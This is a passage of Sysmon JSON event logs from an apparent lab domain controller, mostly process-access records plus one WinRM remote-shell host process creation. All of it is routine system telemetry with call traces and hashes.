\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4512,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.695\r\nProcessGuid: {41C8662E-20BF-5F25-0000-0010F4C20600}\r\nProcessId: 3472\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.695","ProcessGuid":"{41C8662E-20BF-5F25-0000-0010F4C20600}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4513,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-0010F4C20600}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-0010F4C20600}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4514,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-0010F4C20600}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-0010F4C20600}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4515,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4516,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4517,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4518,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4519,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
